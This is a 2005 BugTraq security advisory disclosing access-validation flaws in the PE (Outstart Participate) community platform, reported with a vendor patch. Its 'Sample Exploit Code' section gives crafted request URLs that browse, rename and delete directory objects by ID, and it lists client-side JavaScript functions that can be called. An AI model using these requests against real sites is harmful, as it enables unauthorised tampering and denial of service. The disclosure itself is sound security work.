BugTraq
PE Multiple Remote Access Validation Vulnerabilities (Participate Systems Inc. / Outstart Inc.) Mar 08 2005 07:30AM
Altrus Wollesen (root honour ca)


--------------------------------------------------------
- Multiple Remote Access Validation Vulnerabilities
- With PE (community software)
--------------------------------------------------------
(Altrus::security.honour.ca)

Program name: PE

Versions affected: <unknown>

Vendor(s): Outstart Inc.
Participate Systems Inc.

Vendor Notification Date: 23 FEB 2005

Risk: Moderately Serious
Impact: Denial of Service, File Upload

Vendor Homepages: http://www.outstart.com
http://www.participate.com

---------------------------------------------------------
- Description
---------------------------------------------------------

PE is a proprietary java-based community that mimics the
functionality provided by existing open-source software.
It facilitates community forums, document libraries,
message boards, user interaction and an user management
infrastructure.

From vendor site:

Available as either a hosted or installed solution,
OutStart Participate is improving the collaboration and
knowledge-sharing capabilities of many world-class
companies, including GE Healthcare, Caremark, palmOne,
Logitech, McGraw-Hill and Tivo. OutStart Participate
combines three different systems into one powerful
knowledge-sharing platform.

---------------------------------------------------------
- Discussion
---------------------------------------------------------

The software is affected by an Access Validation Error
that could allow a malicious users to rename or delete
critical directory objects. This could result in a denial
of service of all library, forum, and/or specialized
content until the directory objects were restored or
renamed appropriately.

The Vendor has been notified of this issue, and has
developed a patch. Sites and persons using the software
are advised to install the patch - available from the
vendor.

---------------------------------------------------------
- Sample Exploit Code
---------------------------------------------------------

http://www.targetsite.com/pe/repository/displaynavigator.jsp?rootFolder=
101
-Allows an attacker to browse a limited directory tree (in this case, the action directory. Changing to "rootFolder=105" allows for the document library to be browsed.

http://www.targetsite.com/pe/repository/include/renamepopup.jsp?selected
Object=101
-Allows an attacker to rename the selected object ID (in this case, the action directory).

http://www.targetsite.com/pe/repository/displaydeletenavigator.jsp?selec
tedObjectsCSV=101
-Sets the object CSV for the delete navigator.

The following javascript commands might also be used to
call functions otherwise unavailable to the user:

showDeleteView()
showWebFolderView()
showLibraryView()
showMyLibraryView()
singleSelectObject(objid)
processRadioSelection(radio, objid)
processCheckboxSelection(chkbox, objid)
singleSelectObject(objid)
addToSelectedObjects(objid)
removeFromSelectedObjects(objid)

---------------------------------------------------------
- Solutions
---------------------------------------------------------

The vendor has provided a patch. Its effectiveness is
not confirmed, nor is its distribution.

---------------------------------------------------------
- References
---------------------------------------------------------

Authorative and updated copies of this vulnerability can
be found at:

http://security.honour.ca

---------------------------------------------------------
- Credits
---------------------------------------------------------

Discovered by: Altrus [root (at) honour (dot) ca [email concealed]]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus